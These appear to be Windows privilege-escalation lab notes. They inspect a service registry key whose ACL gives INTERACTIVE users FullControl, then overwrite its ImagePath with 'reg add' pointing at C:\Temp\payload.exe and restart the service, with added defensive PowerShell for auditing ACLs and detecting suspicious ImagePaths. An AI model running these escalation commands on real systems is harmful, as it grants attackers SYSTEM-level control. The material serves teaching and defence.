- reg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
DisplayName REG_SZ Insecure Registry Service
ObjectName REG_SZ LocalSystem
Get the ACL on the service's registry key via PowerShell
2a) powershell -exec bypass -c "Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\regsvc | Format-List"
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : Everyone Allow ReadKey
NT AUTHORITY\INTERACTIVE Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)
or via accesschk from Sysinternals (-k selects registry keys, -w shows only write access)
2b) accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
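Steps 2a and 2b inspect one key by hand. The following PowerShell function is an added example, not part of the original notes, that runs the same check across every key under HKLM\SYSTEM\CurrentControlSet\Services and reports ACEs that give a low-privileged principal write-class rights on a service key (the situation above, where NT AUTHORITY\INTERACTIVE holds FullControl). The list of principals treated as low-privileged is an assumption for the example; extend it with whatever groups map to ordinary users in your environment.

```powershell
# Added example (not code from the original notes): audit service keys for ACEs
# that let low-privileged principals rewrite values such as ImagePath.

# Principals treated as low-privileged (assumption; extend for your environment).
$lowPrivPrincipals = @(
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'BUILTIN\Users'
)

# Rights that allow changing the key's contents or its security. FullControl is
# deliberately not in the mask: it contains the read bits too, so masking with it
# would flag harmless ReadKey ACEs. A FullControl ACE still matches via SetValue.
$writeMask = [int][System.Security.AccessControl.RegistryRights]'SetValue,CreateSubKey,Delete,ChangePermissions,TakeOwnership'
$genericWrite = 0x40000000   # GENERIC_WRITE, seen on ACEs .NET did not map to specific rights

function Test-WriteRights {
    param([int]$Rights)
    # Negative values carry the GENERIC_ALL bit (0x80000000).
    return ($Rights -lt 0) -or (($Rights -band $genericWrite) -ne 0) -or (($Rights -band $writeMask) -ne 0)
}

function Find-WeakServiceKeyAcl {
    [CmdletBinding()]
    param(
        [string]$ServicesPath = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    )
    Get-ChildItem -Path $ServicesPath -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        try {
            $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop
        } catch {
            return   # keys the current user cannot read are skipped
        }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (-not (Test-WriteRights -Rights ([int]$ace.RegistryRights))) { continue }
            [PSCustomObject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

# Whole-system sweep; for the single key from the notes, pass the key as -ServicesPath
# on the parent and filter on Service -eq 'regsvc'.
Find-WeakServiceKeyAcl | Sort-Object Service | Format-Table -AutoSize
```

A non-inherited ACE for a low-privileged principal on a single service key (as with regsvc above) is the more telling finding; an inherited one usually means the parent Services key itself has been loosened, which should be fixed at the parent.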
and the last check: whether the current user can start and stop the service (-c selects services)
3) accesschk.exe /accepteula -ucqv regsvc
regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
…
SERVICE_START
SERVICE_STOP
…
Change ImagePath to the payload
4) reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\payload.exe /f
and restart the service
net stop regsvc
net start regsvc
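Step 4 leaves two traces a defender can look for: an ImagePath that points somewhere a service binary does not belong, and a write to the service key itself. The script below is an added example, not part of the original notes. Its first function reduces each ImagePath to the executable it launches and flags services whose binary lives outside %SystemRoot% and the Program Files directories (which roots count as trusted is an assumption; adjust it). Its second function adds a SACL entry to a service key so that later writes to it generate a registry-modification audit event (Event ID 4657); this assumes an elevated session and that the "Audit Registry" subcategory is enabled in the audit policy, which the script does not configure.

```powershell
# Added example (not code from the original notes).

# Directories treated as expected homes for service binaries (assumption; adjust).
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Get-ServiceBinaryPath {
    # Reduce a raw ImagePath value to the executable path it launches.
    param([Parameter(Mandatory)][string]$ImagePath)
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()
    $p = $p -replace '^\\\?\?\\', ''                    # strip the NT "\??\" prefix
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot    # driver-style "\SystemRoot\..."
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)                        # quoted path: keep the quoted part
        $p = if ($end -gt 1) { $p.Substring(1, $end - 1) } else { $p.TrimStart('"') }
    } elseif ($p -match '^(.*?\.(exe|sys))(\s|$)') {
        $p = $Matches[1]                                 # unquoted: up to the first .exe/.sys
    } else {
        $p = ($p -split '\s+')[0]
    }
    if ($p -notmatch '^[A-Za-z]:\\') {                   # relative paths resolve from %SystemRoot%
        $p = Join-Path $env:SystemRoot $p
    }
    return $p
}

function Find-UntrustedServiceImagePath {
    param([string]$ServicesPath = 'HKLM:\SYSTEM\CurrentControlSet\Services')
    Get-ChildItem -Path $ServicesPath -ErrorAction SilentlyContinue | ForEach-Object {
        $raw = (Get-ItemProperty -Path $_.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        if (-not $raw) { return }
        $bin = Get-ServiceBinaryPath -ImagePath $raw
        $trusted = $false
        foreach ($root in $trustedRoots) {
            if ($bin.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $trusted = $true; break }
        }
        if (-not $trusted) {
            [PSCustomObject]@{
                Service   = $_.PSChildName
                ImagePath = $raw
                Binary    = $bin
                Exists    = (Test-Path -LiteralPath $bin)
            }
        }
    }
}

function Enable-ServiceKeyWriteAudit {
    # Record successful writes to the service key by any principal (needs an
    # elevated session; events appear only if "Audit Registry" is enabled).
    param([Parameter(Mandatory)][string]$ServiceName)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $acl = Get-Acl -Path $key -Audit
    $rule = New-Object System.Security.AccessControl.RegistryAuditRule(
        'Everyone',
        'SetValue,CreateSubKey,Delete,ChangePermissions,TakeOwnership',
        'ContainerInherit', 'None', 'Success')
    $acl.AddAuditRule($rule)
    Set-Acl -Path $key -AclObject $acl
}

Find-UntrustedServiceImagePath | Format-Table -AutoSize
# Enable-ServiceKeyWriteAudit -ServiceName regsvc
```

An ImagePath such as C:\Temp\payload.exe from step 4 shows up in the first report with Binary outside every trusted root; legitimately installed third-party services in other directories will also appear, so the list is a review queue rather than a verdict.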